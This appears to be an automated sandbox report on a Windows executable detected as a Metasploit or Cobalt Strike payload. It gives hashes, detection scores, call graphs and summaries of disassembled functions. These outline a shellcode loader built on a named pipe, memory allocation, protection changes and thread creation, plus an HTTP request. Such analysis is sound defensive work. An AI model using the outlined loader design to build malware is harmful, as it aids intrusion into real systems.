                                    Imagebase:0x400000
                                    File size:19'456 bytes
                                    MD5 hash:A7E64FEA00D97B963D90E53093D5E220
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 87%, ReversingLabs
                                    Reputation:low
                                    Has exited:true
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    Target ID:5
                                    Start time:04:27:06
                                    Start date:30/01/2025
                                    Path:C:\Windows\System32\WerFault.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 3848 -s 1116
                                    Imagebase:0x7ff695aa0000
                                    File size:570'736 bytes
                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    Executed Functions

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1729406691.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd9b850000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 5@_H
                                    • API String ID: 0-3541029494
                                    • Opcode ID: c5cd6a1265293f2cfcef8d62a4476dfa82cb86ecca8e6ac1254162600c16ad58
                                    • Instruction ID: 425a645cb56d537b73a092cdec12bcfb9f0b04b6c0790640e60661dc8ea7f9c5
                                    • Opcode Fuzzy Hash: c5cd6a1265293f2cfcef8d62a4476dfa82cb86ecca8e6ac1254162600c16ad58
                                    • Instruction Fuzzy Hash: 77225932B1EB8D4FE7A69BAC48655B47BE1EF5B610B0901FBD08DC71A3D954AC06C381
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1729406691.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd9b850000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7f5c982ab21935446619d6720832cd18635fecfaa99960aebe724ce8392f23cd
                                    • Instruction ID: d4c1a58989f6c23b36524b3c7a2c1784d85372c196c4139c615b1279eb54c177
                                    • Opcode Fuzzy Hash: 7f5c982ab21935446619d6720832cd18635fecfaa99960aebe724ce8392f23cd
                                    • Instruction Fuzzy Hash: 74122822A1EBCE4FD7629BA848796B47FE1EF5B610B0A40FBD04CCB1A3D9589D05C351
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1729406691.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd9b850000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 81f2bcd0cb7aef295d96f30d89456bbb5c8705b300e14065549655be39db009c
                                    • Instruction ID: 1eb99c4d3d61f95a569991d42c84a2f650d718b5aa38e0af235a729096238739
                                    • Opcode Fuzzy Hash: 81f2bcd0cb7aef295d96f30d89456bbb5c8705b300e14065549655be39db009c
                                    • Instruction Fuzzy Hash: FF410631A1EA894FD7A69BA884686707BE1EF5A304F4A40FBD04DCB1A3DA18EC45C741
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1729406691.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd9b850000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 482e5143e829035655cf72f847831765cc3f5aed309d9e4282a49f1bf276882d
                                    • Instruction ID: 8ab45c52be7c18648b1bea3872a4d7654832bea37f3f81dcb3bc5b6a823384b4
                                    • Opcode Fuzzy Hash: 482e5143e829035655cf72f847831765cc3f5aed309d9e4282a49f1bf276882d
                                    • Instruction Fuzzy Hash: 0A11EC22F3FD0E4FE7BA97DC557217D22C2EF49A10B4601F9E40DC21E6DE5869021381
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1729052066.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd9b780000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                    • Instruction ID: da149d379224387e32e8b8b5eda8ddfe71311dbbbbf26bb8a326a8a06e988265
                                    • Opcode Fuzzy Hash: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                    • Instruction Fuzzy Hash: 8401A73020CB0C4FD748EF0CE091AA5B3E0FB85321F10056DE58AC36A1D632E881CB41

                                    Execution Graph

                                    Execution Coverage

                                    Dynamic/Packed Code Coverage

                                    Signature Coverage

                                    Execution Coverage:13.9%
                                    Dynamic/Decrypted Code Coverage:0.9%
                                    Signature Coverage:14.4%
                                    Total number of Nodes:215
                                    Total number of Limit Nodes:6
                                    Show Legend
                                    Hide Nodes/Edges
                                    execution_graph 850 4014c0 855 401990 850->855 852 4014d6 859 401180 852->859 854 4014db 856 4019d0 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 855->856 857 4019b9 855->857 858 401a2b 856->858 857->852 858->852 860 401460 GetStartupInfoA 859->860 861 4011b4 859->861 876 4013b4 860->876 862 4011e1 Sleep 861->862 863 4011f6 861->863 862->861 864 401229 863->864 865 40142c _initterm 863->865 863->876 877 401fd0 864->877 865->864 867 401251 SetUnhandledExceptionFilter 897 4024e0 867->897 869 40130e malloc 870 401335 869->870 871 40137b 869->871 873 401340 strlen malloc memcpy 870->873 903 403040 871->903 872 40126d 872->869 873->873 874 401376 873->874 874->871 876->854 878 402008 877->878 885 401ff2 877->885 879 402240 878->879 880 4021ce 878->880 881 4022a8 878->881 878->885 892 4020b0 878->892 879->885 891 40223a 879->891 883 40228c 880->883 908 401dc0 880->908 884 401d50 8 API calls 881->884 882 401dc0 8 API calls 882->891 938 401d50 883->938 889 4022b4 884->889 885->867 886 402208 890 401dc0 8 API calls 886->890 889->867 890->891 891->879 891->882 891->883 892->880 892->883 892->886 893 401dc0 8 API calls 892->893 894 402160 892->894 895 402156 892->895 893->892 894->885 896 402192 VirtualProtect 894->896 895->894 896->894 899 4024ef 897->899 898 40251c 898->872 899->898 968 402a80 899->968 901 402517 901->898 902 4025c5 RtlAddFunctionTable 901->902 902->898 904 40304a 903->904 972 4017f8 GetTickCount 904->972 907 403058 SleepEx 907->907 909 401f64 908->909 910 401de2 908->910 909->886 911 401e90 910->911 912 401fa2 910->912 913 401e2b 910->913 914 401eb9 911->914 917 401d50 4 API calls 911->917 915 401d50 4 API calls 912->915 916 401e4c VirtualQuery 913->916 914->886 915->911 916->911 918 401e78 916->918 934 401fcc 917->934 918->911 919 401f20 VirtualProtect 918->919 919->911 920 401f50 GetLastError 919->920 922 401d50 4 API calls 920->922 921 401ff2 921->886 922->909 923 4021ce 927 40228c 923->927 931 401dc0 4 API calls 923->931 924 4022a8 928 401d50 4 API calls 924->928 925 401dc0 4 API calls 926 40223a 925->926 926->921 926->925 926->927 930 401d50 4 API calls 927->930 932 4022b4 928->932 929 402208 933 401dc0 4 API calls 929->933 930->924 931->929 932->886 933->926 934->921 934->923 934->924 934->926 934->927 934->929 935 401dc0 VirtualQuery VirtualProtect GetLastError VirtualProtect 934->935 936 402156 934->936 935->934 936->921 937 402192 VirtualProtect 936->937 937->936 940 401d7d 938->940 939 401f64 939->881 940->939 941 401e90 940->941 942 401fa2 940->942 943 401e2b 940->943 944 401eb9 941->944 947 401d50 4 API calls 941->947 945 401d50 4 API calls 942->945 946 401e4c VirtualQuery 943->946 944->881 945->941 946->941 948 401e78 946->948 962 401fcc 947->962 948->941 949 401f20 VirtualProtect 948->949 949->941 950 401f50 GetLastError 949->950 951 401d50 4 API calls 950->951 951->939 952 4021ce 956 40228c 952->956 960 401dc0 4 API calls 952->960 953 4022a8 957 401d50 4 API calls 953->957 954 401dc0 4 API calls 955 40223a 954->955 955->954 955->956 967 401ff2 955->967 959 401d50 4 API calls 956->959 963 4022b4 957->963 958 402208 961 401dc0 4 API calls 958->961 959->953 960->958 961->955 962->952 962->953 962->955 962->956 962->958 964 401dc0 VirtualQuery VirtualProtect GetLastError VirtualProtect 962->964 965 402156 962->965 962->967 963->881 964->962 966 402192 VirtualProtect 965->966 965->967 966->965 967->881 970 402a90 968->970 969 402afe 969->901 970->969 971 402ae9 strncmp 970->971 971->969 971->970 973 402e28 972->973 974 401866 CreateThread 973->974 975 4017a6 malloc 974->975 990 4016e6 974->990 976 4017c8 SleepEx 975->976 982 401704 CreateFileA 976->982 979 4017de 987 401595 VirtualAlloc 979->987 981 4017ed 981->907 983 40179c 982->983 986 40175e 982->986 983->976 983->979 984 401781 CloseHandle 984->983 985 401762 ReadFile 985->984 985->986 986->984 986->985 988 4015c7 987->988 989 4015e8 VirtualProtect CreateThread 988->989 989->981 993 401630 CreateNamedPipeA 990->993 994 4016dc 993->994 995 40168f ConnectNamedPipe 993->995 995->994 996 4016a3 995->996 997 4016c6 CloseHandle 996->997 998 4016a7 WriteFile 996->998 997->994 998->997 999 4016d1 998->999 999->996 1002 401c40 1003 401c5f 1002->1003 1004 401c9d fprintf 1003->1004 1068 402880 1069 4028a0 EnterCriticalSection 1068->1069 1070 402891 1068->1070 1071 4028e3 LeaveCriticalSection 1069->1071 1072 4028b9 1069->1072 1072->1071 1073 4028de free 1072->1073 1073->1071 1074 401010 1075 401058 1074->1075 1076 40107a __set_app_type 1075->1076 1077 401084 1075->1077 1076->1077 1005 402352 signal 1006 402368 signal 1005->1006 1007 40237c 1005->1007 1006->1007 1008 402fd9 GetLastError 1081 403019 CreateFileA 1012 4025e0 1013 402602 1012->1013 1014 402718 signal 1013->1014 1016 402683 signal 1013->1016 1018 402614 1013->1018 1014->1013 1015 402779 signal 1014->1015 1016->1013 1017 402740 signal 1016->1017 1017->1018 1085 401ba0 1086 401bb2 1085->1086 1087 402910 3 API calls 1086->1087 1088 401bc2 1086->1088 1089 401c15 1087->1089 1019 402f69 SetUnhandledExceptionFilter 1020 4026e9 signal 1021 402760 signal 1020->1021 1023 402602 1020->1023 1022 402614 1023->1022 1024 402718 signal 1023->1024 1026 402683 signal 1023->1026 1024->1023 1025 402779 signal 1024->1025 1026->1023 1027 402740 signal 1026->1027 1027->1022 1090 40262e signal 1091 402644 signal 1090->1091 1093 402602 1090->1093 1092 402614 1091->1092 1093->1092 1094 402718 signal 1093->1094 1096 402683 signal 1093->1096 1094->1093 1095 402779 signal 1094->1095 1096->1093 1097 402740 signal 1096->1097 1097->1092 1028 401a70 RtlCaptureContext RtlLookupFunctionEntry 1029 401b4d 1028->1029 1030 401aad RtlVirtualUnwind 1028->1030 1031 401ae3 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess abort 1029->1031 1030->1031 1031->1029 1032 401b70 1033 401b79 1032->1033 1034 401b7d 1033->1034 1037 402910 1033->1037 1036 401b95 1038 40291e 1037->1038 1039 4029e0 1037->1039 1040 402924 1038->1040 1042 40292e 1038->1042 1044 402970 1038->1044 1039->1036 1041 402960 InitializeCriticalSection 1040->1041 1040->1042 1041->1042 1042->1036 1043 4029b1 DeleteCriticalSection 1043->1042 1044->1042 1044->1043 1045 4029a0 free 1044->1045 1045->1043 1045->1045 1046 4014f0 1047 401990 5 API calls 1046->1047 1048 401506 1047->1048 1049 401180 34 API calls 1048->1049 1050 40150b 1049->1050 1098 402f31 VirtualQuery 1000 1d0128 HttpOpenRequestA 1001 1d014f 1000->1001 1054 4027f6 1055 402820 1054->1055 1056 402816 1054->1056 1055->1056 1057 402837 EnterCriticalSection LeaveCriticalSection 1055->1057 1058 4023f7 signal 1059 4024a0 signal 1058->1059 1060 40237f 1058->1060 1064 402f79 RtlLookupFunctionEntry

                                    Callgraph

                                    Hide Legend
                                    • Executed
                                    • Not Executed
                                    • Opacity -> Relevance
                                    • Disassembly available
                                    callgraph 0 Function_00401C40 6 Function_00402EC0 0->6 1 Function_00401DC0 1->1 8 Function_00401D50 1->8 9 Function_00402C50 1->9 11 Function_00402DD0 1->11 68 Function_00402B20 1->68 78 Function_00402BB0 1->78 2 Function_00401540 3 Function_00401D40 4 Function_004014C0 45 Function_00401180 4->45 59 Function_00401990 4->59 5 Function_00403040 10 Function_00401950 5->10 38 Function_004017F8 5->38 7 Function_00401FD0 7->1 7->8 7->11 7->78 8->1 8->6 8->8 8->9 8->11 8->68 8->78 31 Function_004029F0 9->31 12 Function_00402352 12->3 13 Function_004092D4 14 Function_004051D7 15 Function_00402FD9 16 Function_001D0000 17 Function_004024E0 17->9 18 Function_00402BE0 17->18 47 Function_00402A80 17->47 18->31 19 Function_00401CE0 19->6 20 Function_004025E0 21 Function_00402EE0 22 Function_00401563 23 Function_004092E4 24 Function_004016E6 74 Function_00401630 24->74 25 Function_00402F69 26 Function_004026E9 27 Function_00401A70 28 Function_00401B70 56 Function_00402910 28->56 29 Function_004014F0 29->45 29->59 30 Function_00402EF0 32 Function_00401CF0 32->6 33 Function_00401972 34 Function_00409274 35 Function_001D0128 36 Function_004027F6 37 Function_004023F7 38->24 50 Function_00401704 38->50 63 Function_00401595 38->63 39 Function_00401C78 39->6 40 Function_00402F79 41 Function_004052F9 42 Function_001D01A7 43 Function_00401980 44 Function_00401D00 44->6 45->3 45->5 45->7 45->10 45->17 45->30 49 Function_00402F00 45->49 46 Function_00402C80 46->31 47->31 48 Function_00402880 51 Function_00409304 52 Function_00405305 53 Function_0040930C 54 Function_00402F10 55 Function_00401010 55->43 55->54 56->3 57 Function_00401D10 57->6 58 Function_00402D10 58->31 60 Function_00405311 61 Function_00402A12 62 Function_00409314 63->22 64 Function_00403019 65 Function_00402E99 66 Function_0040931C 67 Function_00401520 68->31 69 Function_00401D20 69->6 70 Function_00401BA0 70->56 71 Function_004018A0 72 Function_00402EA9 73 Function_0040262E 73->3 75 Function_00401130 76 Function_00401C30 77 Function_00402A30 78->31 79 Function_00402F31 80 Function_00409234

                                    Executed Functions

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 10 401180-4011ae 11 401460-401463 GetStartupInfoA 10->11 12 4011b4-4011d1 10->12 16 401470-40148a call 402e88 11->16 13 4011e9-4011f4 12->13 14 4011f6-401204 13->14 15 4011d8-4011db 13->15 17 401417-401426 call 402e90 14->17 18 40120a-40120e 14->18 20 401400-401411 15->20 21 4011e1-4011e6 Sleep 15->21 27 401229-40122b 17->27 28 40142c-401447 _initterm 17->28 23 401490-4014a9 call 402e80 18->23 24 401214-401223 18->24 20->17 20->18 21->13 36 4014ae-4014b6 call 402e60 23->36 24->27 24->28 30 401231-40123e 27->30 31 40144d-401452 27->31 28->30 28->31 33 401240-401248 30->33 34 40124c-401299 call 401fd0 SetUnhandledExceptionFilter call 4024e0 call 402ef0 call 401d40 call 402f00 30->34 31->30 33->34 48 4012b2-4012b8 34->48 49 40129b 34->49 51 4012a0-4012a2 48->51 52 4012ba-4012c8 48->52 50 4012f0-4012f6 49->50 53 4012f8-401302 50->53 54 40130e-401333 malloc 50->54 55 4012a4-4012a7 51->55 56 4012e9 51->56 57 4012ae 52->57 58 4013f0-4013f5 53->58 59 401308 53->59 60 401335-40133a 54->60 61 40137b-4013af call 401950 call 403040 54->61 62 4012d0-4012d2 55->62 63 4012a9 55->63 56->50 57->48 58->59 59->54 64 401340-401374 strlen malloc memcpy 60->64 72 4013b4-4013c2 61->72 62->56 66 4012d4 62->66 63->57 64->64 67 401376 64->67 69 4012d8-4012e2 66->69 67->61 69->56 71 4012e4-4012e7 69->71 71->56 71->69 72->36 73 4013c8-4013d0 72->73 73->16 74 4013d6-4013e5 73->74
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                                    • String ID: @P@
                                    • API String ID: 649803965-1136412694
                                    • Opcode ID: b78087a4727109617a980b8b34e7f88b19eb7fde71d655465aeb3eeb3b98bcac
                                    • Instruction ID: 0837f65e99a2b31b617579b96e5607858f818787d00fb595da640d4b13c89ff1
                                    • Opcode Fuzzy Hash: b78087a4727109617a980b8b34e7f88b19eb7fde71d655465aeb3eeb3b98bcac
                                    • Instruction Fuzzy Hash: FB7199B2601B0486EB259F56E99476A33A1F745B88F84803BEF49773A1DF7CC884C748

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 75 401630-40168d CreateNamedPipeA 76 4016dc-4016e5 75->76 77 40168f-4016a1 ConnectNamedPipe 75->77 77->76 78 4016a3-4016a5 77->78 79 4016c6-4016cf CloseHandle 78->79 80 4016a7-4016c4 WriteFile 78->80 79->76 80->79 81 4016d1-4016da 80->81 81->78
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: NamedPipe$CloseConnectCreateFileHandleWrite
                                    • String ID:
                                    • API String ID: 2239253087-0
                                    • Opcode ID: c91bc22eb4ab6627967eacdcd294d58c4f35a533641819062c461ff4691d2373
                                    • Instruction ID: 792960597df4a3593b3ed71ec0f1f42691249fcecf88183cb5a5311cb3ffe816
                                    • Opcode Fuzzy Hash: c91bc22eb4ab6627967eacdcd294d58c4f35a533641819062c461ff4691d2373
                                    • Instruction Fuzzy Hash: 7311A57171464487E7208B12EC4871B7660B785BA4F588639EF59277E4DF7DC409CB08

                                    Control-flow Graph

                                    APIs
                                    • malloc.MSVCRT ref: 004017B9
                                    • SleepEx.KERNELBASE ref: 004017CD
                                      • Part of subcall function 00401704: CreateFileA.KERNEL32 ref: 0040174D
                                      • Part of subcall function 00401704: ReadFile.KERNEL32 ref: 00401777
                                      • Part of subcall function 00401704: CloseHandle.KERNEL32 ref: 00401784
                                    • GetTickCount.KERNEL32 ref: 004017FC
                                    • CreateThread.KERNEL32 ref: 00401885
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: CreateFile$CloseCountHandleReadSleepThreadTickmalloc
                                    • String ID: @@$%c%c%c%c%c%c%c%c%cMSSE-%d-server$.$\$\$e$i$p$p
                                    • API String ID: 3660650057-1020837823
                                    • Opcode ID: f49c4c9a7e10605904a6a10e00f2c520319c1cb0802325312295c4206e11c210
                                    • Instruction ID: b1b191c08856ce7a5ac3e1961f061f1fb3c952ac0291ac520aaac2e6cde2bc09
                                    • Opcode Fuzzy Hash: f49c4c9a7e10605904a6a10e00f2c520319c1cb0802325312295c4206e11c210
                                    • Instruction Fuzzy Hash: BB11E1B2214A80C6F714DF62F84975BBBA0F384749F44412ADB49277A8CB7CC445CF48

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 82 401595-4015c5 VirtualAlloc 83 4015c7-4015c9 82->83 84 4015e0-40162c call 401563 VirtualProtect CreateThread 83->84 85 4015cb-4015de 83->85 85->83
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: Virtual$AllocCreateProtectThread
                                    • String ID:
                                    • API String ID: 3039780055-0
                                    • Opcode ID: 4aacca1e8eccfaf740ded84acdafb972c0e8b5e828dd24c9fd05ba3d77ec4f75
                                    • Instruction ID: a871edb487987511a762a7aedd3aa3d9a3b96542bc8ba466cbe2f33faf2e38cc
                                    • Opcode Fuzzy Hash: 4aacca1e8eccfaf740ded84acdafb972c0e8b5e828dd24c9fd05ba3d77ec4f75
                                    • Instruction Fuzzy Hash: 3D012B9231558051E7249B73AC08B9AAA91A38DBC9F48C139EF4B5BBA5DA3CC505C708

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 88 401704-40175c CreateFileA 89 40179c-4017a5 88->89 90 40175e-401760 88->90 91 401781-40178f CloseHandle 90->91 92 401762-40177f ReadFile 90->92 91->89 92->91 93 401791-40179a 92->93 93->90
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleRead
                                    • String ID:
                                    • API String ID: 1035965006-0
                                    • Opcode ID: a9a6f3105b428fa11eb0a8b9509746e60382a865a5325daa86df34bad7210379
                                    • Instruction ID: 40b2c8f30f00ef97869f90130fa51706c158e82a26dd4cfec866ebc6162fc2d5
                                    • Opcode Fuzzy Hash: a9a6f3105b428fa11eb0a8b9509746e60382a865a5325daa86df34bad7210379
                                    • Instruction Fuzzy Hash: 2101F77531460186E7219B16F90471776A0B394BA4F648339EFA917BD4DB7DC50ACB08

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 94 1d0128-1d014e HttpOpenRequestA 95 1d014f-1d016b 94->95 97 1d030e-1d032f 95->97 98 1d0171-1d0174 95->98 102 1d0331-1d034e 97->102 99 1d017a 98->99 100 1d0306-1d0307 98->100 99->95 100->97 102->100 104 1d0350-1d0358 102->104 104->102 105 1d035a-1d0364 104->105
                                    APIs
                                    • HttpOpenRequestA.WININET(00000000,00000000,84400200,00000000), ref: 001D0143
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_1d0000_tmpE651.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: HttpOpenRequest
                                    • String ID: U.;
                                    • API String ID: 1984915467-4213443877
                                    • Opcode ID: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
                                    • Instruction ID: 767248024086661c30a9dc68eb7a0cf621d7fd2920bd6f6d9c9f0a41f2afc3c3
                                    • Opcode Fuzzy Hash: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
                                    • Instruction Fuzzy Hash: EB116D6034980D1BE61D95AE7C9A73A11CAE7DC765F25823FB40EC33D9EE54CC83816A

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 106 403040-403051 call 401950 call 4017f8 111 403058-40305f SleepEx 106->111 111->111
                                    APIs
                                      • Part of subcall function 004017F8: malloc.MSVCRT ref: 004017B9
                                      • Part of subcall function 004017F8: SleepEx.KERNELBASE ref: 004017CD
                                      • Part of subcall function 004017F8: GetTickCount.KERNEL32 ref: 004017FC
                                      • Part of subcall function 004017F8: CreateThread.KERNEL32 ref: 00401885
                                    • SleepEx.KERNELBASE(?,?,?,004013B4), ref: 0040305D
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: Sleep$CountCreateThreadTickmalloc
                                    • String ID:
                                    • API String ID: 345437100-0
                                    • Opcode ID: b6d36b54cf31cf0f426623e933f06735054b4a30bed8d9593c1a6858c86775c1
                                    • Instruction ID: 8364c3e29ff4e62ba415e97045e67fc6fb748e7a580f304519b0ce082c56ecd4
                                    • Opcode Fuzzy Hash: b6d36b54cf31cf0f426623e933f06735054b4a30bed8d9593c1a6858c86775c1
                                    • Instruction Fuzzy Hash: B4C022A030208880EF08B3B280AB32E0A080B08388F0C083FEF0B322E28C3CC000030E

                                    Non-executed Functions

                                    Control-flow Graph

                                    APIs
                                    • RtlCaptureContext.KERNEL32 ref: 00401A84
                                    • RtlLookupFunctionEntry.KERNEL32 ref: 00401A9B
                                    • RtlVirtualUnwind.KERNEL32 ref: 00401ADD
                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 00401B21
                                    • UnhandledExceptionFilter.KERNEL32 ref: 00401B2E
                                    • GetCurrentProcess.KERNEL32 ref: 00401B34
                                    • TerminateProcess.KERNEL32 ref: 00401B42
                                    • abort.MSVCRT ref: 00401B48
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
